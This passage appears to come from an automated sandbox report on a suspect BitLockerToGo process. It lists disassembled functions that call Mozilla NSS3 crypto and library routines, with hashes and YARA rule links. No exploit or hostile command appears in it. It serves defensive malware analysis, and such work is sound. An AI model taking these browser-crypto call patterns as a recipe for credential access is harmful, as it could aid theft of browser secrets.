                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 73171be583fb1ff46a249535a527f193dedd2c0a3bdfe0f417d9f60283168fa9
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3a00f97e3767b76445513c7d0d77c6d9decf78ae08a2d7c37aad76b9c597b4bf
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73171be583fb1ff46a249535a527f193dedd2c0a3bdfe0f417d9f60283168fa9
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48512871508300ABD7109A999C40FAB77E8AF8A75CF40C82EF955D7B50E731D90A87AB
                                                                                                                                                                                                                                                                                                                                                          Function 6C70CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C70CC7B), ref: 6C70CD7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C67C1A8,?), ref: 6C70CE92
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C70CDA5
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C70CDB8
                                                                                                                                                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C70CDDB
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C70CD8E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6305C0: PR_EnterMonitor.NSS3 ref: 6C6305D1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6305C0: PR_ExitMonitor.NSS3 ref: 6C6305EA
                                                                                                                                                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C70CDE8
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C70CDFF
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C70CE16
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C70CE29
                                                                                                                                                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C70CE48
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                                                                                                                                                          • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 601260978-871931242
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 76e164ba5f14b90c7ccab57f8cd5ff9454828bdd6744c9ba81abff939bda4ec8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 902391a2c55099e210bf10ec98afef391ddf4e9c5705460dffadd7ec24308a04
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76e164ba5f14b90c7ccab57f8cd5ff9454828bdd6744c9ba81abff939bda4ec8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7311B4E6F0212197EB11AAB63E01A9E38985B0315EF186534E809D6E41FF21D608C3FB
                                                                                                                                                                                                                                                                                                                                                          Function 6C751C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C7513BC,?,?,?,6C751193), ref: 6C751C6B
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,6C751193), ref: 6C751C7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,6C751193), ref: 6C751C91
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6321BC), ref: 6C62BB8C
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,6C751193), ref: 6C751CA7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C62BBEB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C62BBFB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: GetLastError.KERNEL32 ref: 6C62BC03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C62BC19
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: free.MOZGLUE(00000000), ref: 6C62BC22
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,?,6C751193), ref: 6C751CBE
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,?,?,6C751193), ref: 6C751CD4
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C751193), ref: 6C751CFE
                                                                                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,?,?,6C751193), ref: 6C751D1A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C631A48), ref: 6C709BB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C631A48), ref: 6C709BC8
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C751193), ref: 6C751D3D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,6C751193), ref: 6C751D4E
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C751193), ref: 6C751D64
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C751193), ref: 6C751D6F
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C751193), ref: 6C751D7B
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?,?,?,?,?,6C751193), ref: 6C751D87
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(00000000,?,?,?,6C751193), ref: 6C751D93
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(00000000,?,?,6C751193), ref: 6C751D9F
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,6C751193), ref: 6C751DA8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3246495057-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ce5da6db4a987d0f68b12fa7682612be28c3966b4d65b8e07abe257cbcf5f7d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 669a3002faabaaa8228d2cc463002df827e56e78537bf39baeffb6b07263a694
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce5da6db4a987d0f68b12fa7682612be28c3966b4d65b8e07abe257cbcf5f7d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E31E9F1E007015BEB119F64AD01A5776F4EF0664DF040539E84A87B41FF31E818CBA6
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(*,kl), ref: 6C6B0C81
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE30: SECOID_FindOID_Util.NSS3(6C65311B,00000000,?,6C65311B,?), ref: 6C69BE44
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C688500: SECOID_GetAlgorithmTag_Util.NSS3(6C6895DC,00000000,00000000,00000000,?,6C6895DC,00000000,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C688517
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6B0CC4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6B0CD5
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C6B0D1D
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C6B0D3B
                                                                                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C6B0D7D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6B0DB5
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6B0DC1
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6B0DF7
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6B0E05
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6B0E0F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C6895E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C6895F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C689609
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C68961D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: PK11_GetInternalSlot.NSS3 ref: 6C68970B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C689756
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: PK11_GetIVLength.NSS3(?), ref: 6C689767
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C68977E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C68978E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                                                                                                          • String ID: *,kl$*,kl$-$kl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3136566230-1984258503
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f03bc4d38b439e5ff50576ef1c6c9ca98e43ccbce49250bcec2f2498cfaddb8b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0ffbcaa75884fbc8d98b6acbff3a7034f48efb94109f5511c2d5bbb6e2b91d59
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f03bc4d38b439e5ff50576ef1c6c9ca98e43ccbce49250bcec2f2498cfaddb8b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B41C2F1901245ABEB009F65DD45BEF7AB4EF0530CF100424E91567B81E735AA24CBEE
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C6A5EC0,00000000,?,?), ref: 6C6A5CBE
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C6A5CD7
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C6A5CF0
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C6A5D09
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C6A5EC0,00000000,?,?), ref: 6C6A5D1F
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C6A5D3C
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5D51
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5D66
                                                                                                                                                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C6A5D80
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e982b040ce18212bc72fc4d46fa77e3ef6c5acf17409aa5f52de79531f0457ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3cc9771abf8c2f1d4094f97630ecd7d5efc4c9290142cee9c63d110866d06fd1
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e982b040ce18212bc72fc4d46fa77e3ef6c5acf17409aa5f52de79531f0457ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1631E8A07427516BEB00BEB59C48B6637E8AF02349F140530FE56E6A82E775ED13C25D
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C771DE0,?), ref: 6C6A6CFE
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A6D26
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C6A6D70
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000480), ref: 6C6A6D82
                                                                                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C6A6DA2
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6A6DD8
                                                                                                                                                                                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C6A6E60
                                                                                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C6A6F19
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C6A6F2D
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C6A6F7B
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6A7011
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C6A7033
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A703F
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C6A7060
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C6A7087
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C6A70AF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d342dc643f7ba19a16e23fe8387a0e2bd48c7e00228800e29f823f04cc3fb68a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e8ea81b97705913accae615bc60ca2e1efba33ee28fb06caad21608a846586e6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d342dc643f7ba19a16e23fe8387a0e2bd48c7e00228800e29f823f04cc3fb68a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27A118B15092009BEB009BA8DC45B9B72E5EB8530CF244939E919CBB81F775DC47879B
                                                                                                                                                                                                                                                                                                                                                          Function 6C66AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66AF25
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66AF39
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66AF51
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66AF69
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C66B06B
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C66B083
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C66B0A4
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C66B0C1
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C66B0D9
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C66B102
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C66B151
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C66B182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C66B177
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66B1A2
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66B1AA
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66B1C2
